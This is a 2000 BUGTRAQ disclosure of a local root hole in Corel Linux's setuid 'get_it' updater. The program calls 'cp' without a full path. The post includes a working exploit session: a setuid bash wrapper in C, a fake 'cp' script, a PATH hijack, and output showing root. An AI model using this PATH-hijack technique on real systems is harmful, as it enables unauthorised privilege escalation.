Date: Wed, 12 Jan 2000 09:26:49 +0100 From: tascon@ENETE.GUI.UVA.ES Subject: Serious Bug in Corel Linux.(Local root exploit) To: BUGTRAQ@SECURITYFOCUS.COM Corel Linux comes with a program called "Corel Update" to manage the ".deb" files. This X oriented program is setuid root. The program is "get_it" and it's located in the /usr/X11R6/bin directory. If you can run it, it's easy to get root privileges in your system. It copies two files to the temp directory, taking no care to verify how. In fact, it calls the "cp" program WITHOUT THE WHOLE PATH!! The only thing you have to do to hack root, is to change your PATH to execute your personal copy of the program. Let's see the example. ------------------------------ From here -------------------------------- Script started on Wed Jan 12 01:58:17 2000 CorelLinux:~$ id uid=1001(tascon) gid=1001(tascon) groups=1001(tascon) CorelLinux:~$ cat misu.c #include <stdio.h> #include <unistd.h> main(argc,argv) int argc; char **argv; { if (argc==2); setuid(atoi(argv[1])); execlp("/bin/bash","/bin/bash",NULL); } CorelLinux:~$ cc -o misu misu.c CorelLinux:~$ pwd /home/tascon CorelLinux:~$ cat cp echo $1 $2 $3 /home/tascon/misu 0 CorelLinux:~$ export PATH=.:$PATH CorelLinux:~$ get_it /usr/X11R6/share/apps/get_it/html/largebanner.html /tmp/Get_It.0.a05872 CorelLinux:~# id uid=0(root) gid=1001(tascon) groups=1001(tascon) CorelLinux:~# exit exit /usr/X11R6/share/apps/get_it/html/smallbanner.html /tmp/Get_It.1.a05872 CorelLinux:~# id uid=0(root) gid=1001(tascon) groups=1001(tascon) Script done on Wed Jan 12 01:59:12 2000 ---------------------------- To Here ----------------------------------- Easy to patch, isn't it? ***************************************************************************** / Cesar Tascon Alvarez ( to ) ? be : !be / University of Valladolid / (Spain) W. Shakespeare / tascon@gui.uva.es / *****************************************************************************